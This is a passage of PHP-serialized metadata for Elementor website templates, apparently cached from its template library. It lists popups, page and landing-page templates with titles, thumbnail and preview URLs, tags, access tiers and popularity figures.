Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Help.jpg\";s:12:\"tmpl_created\";i:1587474761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-contact-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:530;s:11:\"trend_index\";i:369;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:173;a:19:{s:4:\"tmpl\";i:1053;s:2:\"id\";i:15272;s:5:\"title\";s:32:\"Classic | Contact | Psychologist\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/PopUp.png\";s:12:\"tmpl_created\";i:1600170487;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:578;s:11:\"trend_index\";i:312;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:174;a:19:{s:4:\"tmpl\";i:899;s:2:\"id\";i:11839;s:5:\"title\";s:9:\"Portfolio\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/09/Header_small.png\";s:12:\"tmpl_created\";i:1569430015;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/portfolio-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:43:\"[\"creative portfolio\",\"header\",\"portfolio\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:189;s:11:\"trend_index\";i:20;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:175;a:19:{s:4:\"tmpl\";i:1433;s:2:\"id\";i:24477;s:5:\"title\";s:27:\"Wireframe &#8211; Gallery 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Gallery-2.jpg\";s:12:\"tmpl_created\";i:1653988835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-gallery-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"Business\",\"Contact\",\"Design\",\"Footer\",\"Gallery\",\"Header\",\"Portfolio\",\"Services\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:176;a:19:{s:4:\"tmpl\";i:1205;s:2:\"id\";i:20233;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633881371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:177;a:19:{s:4:\"tmpl\";i:1214;s:2:\"id\";i:20539;s:5:\"title\";s:31:\"Design Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/10/Design-Blog-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/design-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:47:\"[\"Blog\",\"Coming Soon\",\"Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:178;a:19:{s:4:\"tmpl\";i:1224;s:2:\"id\";i:21013;s:5:\"title\";s:24:\"Restaurant &#8211; About\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/12/7-About-Restaurant.jpg\";s:12:\"tmpl_created\";i:1638795588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:36:\"[\"About\",\"Chef\",\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:179;a:19:{s:4:\"tmpl\";i:992;s:2:\"id\";i:13402;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/04/Popup-Course-Completed.jpg\";s:12:\"tmpl_created\";i:1587474772;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:619;s:11:\"trend_index\";i:582;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:180;a:19:{s:4:\"tmpl\";i:1206;s:2:\"id\";i:20254;s:5:\"title\";s:41:\"Digital Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Digital-Marketing-Agency-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/digital-marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:65:\"[\"Agency\",\"Business\",\"Digital Agency\",\"Landing Pages\",\"Services\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:181;a:19:{s:4:\"tmpl\";i:1235;s:2:\"id\";i:21281;s:5:\"title\";s:25:\"Law Firm &#8211; Services\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/16-Services-Law-firm.jpg\";s:12:\"tmpl_created\";i:1638819128;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/law-firm-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Consulting\",\"Law\",\"Law Firm\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:182;a:19:{s:4:\"tmpl\";i:1017;s:2:\"id\";i:14111;s:5:\"title\";s:36:\"Classic | Japanese restaurant | Sale\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1592300400;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-japanese-restaurant-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:717;s:11:\"trend_index\";i:697;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:183;a:19:{s:4:\"tmpl\";i:1213;s:2:\"id\";i:20509;s:5:\"title\";s:40:\"Dogs Adoption &#8211; Social Involvement\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/10/Dog-Adoption-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/dogs-adoption-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:49:\"[\"Adoption\",\"Involvement\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:184;a:19:{s:4:\"tmpl\";i:1233;s:2:\"id\";i:21205;s:5:\"title\";s:29:\"Photographer &#8211; Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/25-Projects-Photographer.jpg\";s:12:\"tmpl_created\";i:1638818372;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/photographer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Black and white\",\"Photography\",\"Project\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:185;a:19:{s:4:\"tmpl\";i:993;s:2:\"id\";i:13422;s:5:\"title\";s:30:\"Classic | Menu | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1587474782;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/classic-menu-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:516;s:11:\"trend_index\";i:432;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:186;a:19:{s:4:\"tmpl\";i:925;s:2:\"id\";i:12540;s:5:\"title\";s:33:\"Classic | Menu | Travel and tours\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_Menu_s.png\";s:12:\"tmpl_created\";i:1575960267;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-menu-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:690;s:11:\"trend_index\";i:714;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:187;a:19:{s:4:\"tmpl\";i:1208;s:2:\"id\";i:20361;s:5:\"title\";s:51:\"Exercise &#038; Fitness Equipment &#8211; eCommerce\";s:9:\"thumbnail\";s:97:\"https://library.elementor.com/wp-content/uploads/2021/10/Exercise-Fitness-Equipment-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633883766;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/lp/exercise-fitness-equipment-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Fitness\",\"Health\",\"Landing Pages\",\"Online Shop\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:188;a:19:{s:4:\"tmpl\";i:1239;s:2:\"id\";i:21373;s:5:\"title\";s:28:\"Photographer &#8211; Gallery\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/18-Gallery-Photographer.jpg\";s:12:\"tmpl_created\";i:1638821177;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/photographer-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Gallery\",\"Photography\",\"Portfolio\",\"Project\",\"Travel\"]\";s:10:\"menu_order\";i:7;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:189;a:19:{s:4:\"tmpl\";i:1426;s:2:\"id\";i:24348;s:5:\"title\";s:24:\"Wireframe &#8211; Home 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-2.jpg\";s:12:\"tmpl_created\";i:1653988444;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:190;a:19:{s:4:\"tmpl\";i:958;s:2:\"id\";i:13129;s:5:\"title\";s:28:\"Classic | Menu | Photography\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/02/PopUp_s.png\";s:12:\"tmpl_created\";i:1582092645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/popups/classic-menu-photography/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:27:\"[\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:8;s:16:\"popularity_index\";i:646;s:11:\"trend_index\";i:521;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:191;a:19:{s:4:\"tmpl\";i:1427;s:2:\"id\";i:24366;s:5:\"title\";s:24:\"Wireframe &#8211; Home 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-3.jpg\";s:12:\"tmpl_created\";i:1653988491;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:192;a:19:{s:4:\"tmpl\";i:1207;s:2:\"id\";i:20299;s:5:\"title\";s:51:\"Interior Design Consultation &#8211; Online Service\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2021/10/Interior-Design-Consultation-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882989;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:145:\"https://library.elementor.com/lp/interior-design-consultation-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:65:\"[\"Consulting\",\"Interior Design\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:193;a:19:{s:4:\"tmpl\";i:952;s:2:\"id\";i:12726;s:5:\"title\";s:52:\"Classic | Newsletter | Subscribe | Magazine and Blog\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_Newsletter_s.png\";s:12:\"tmpl_created\";i:1579061019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:152:\"https://library.elementor.com/popups/classic-newsletter-subscribe-magazine-and-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:9;s:16:\"popularity_index\";i:357;s:11:\"trend_index\";i:281;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:194;a:19:{s:4:\"tmpl\";i:883;s:2:\"id\";i:11468;s:5:\"title\";s:20:\"Classic | Sale | Gym\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/08/PopUp_Small.png\";s:12:\"tmpl_created\";i:1567393182;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/classic-sale-gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:696;s:11:\"trend_index\";i:740;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:195;a:19:{s:4:\"tmpl\";i:1216;s:2:\"id\";i:20623;s:5:\"title\";s:57:\"Luxurious Camping Accommodation For Events &#8211; Events\";s:9:\"thumbnail\";s:113:\"https://library.elementor.com/wp-content/uploads/2021/10/Luxurious-Camping-Accommodation-For-Events-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634041681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:151:\"https://library.elementor.com/lp/luxurious-camping-accommodation-for-events-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:43:\"[\"Event\",\"Events\",\"Landing Pages\",\"Travel\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:196;a:19:{s:4:\"tmpl\";i:1219;s:2:\"id\";i:20886;s:5:\"title\";s:28:\"Online Training &#8211; Home\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/12/2-Home-Online-Training.jpg\";s:12:\"tmpl_created\";i:1638784769;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/online-training-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Fitness\",\"Online\",\"Sport\",\"Training\"]\";s:10:\"menu_order\";i:10;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:197;a:19:{s:4:\"tmpl\";i:1065;s:2:\"id\";i:15570;s:5:\"title\";s:33:\"Classic | Subscribe | Travel Blog\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp.jpg\";s:12:\"tmpl_created\";i:1606215555;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-subscribe-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:709;s:11:\"trend_index\";i:459;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:198;a:19:{s:4:\"tmpl\";i:1431;s:2:\"id\";i:24437;s:5:\"title\";s:25:\"Wireframe &#8211; About 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-4.jpg\";s:12:\"tmpl_created\";i:1653988733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:74:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:199;a:19:{s:4:\"tmpl\";i:1210;s:2:\"id\";i:20414;s:5:\"title\";s:45:\"Online English Courses &#8211; Online Service\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Online-English-Courses-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884482;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/online-english-courses-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:50:\"[\"Course Online\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:200;a:19:{s:4:\"tmpl\";i:1132;s:2:\"id\";i:16553;s:5:\"title\";s:31:\"Fly-In | Contact | Beauty Salon\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/12/PopUp.jpg\";s:12:\"tmpl_created\";i:1608622602;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-contact-beauty-salon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:691;s:11:\"trend_index\";i:428;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:201;a:19:{s:4:\"tmpl\";i:1441;s:2:\"id\";i:24574;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 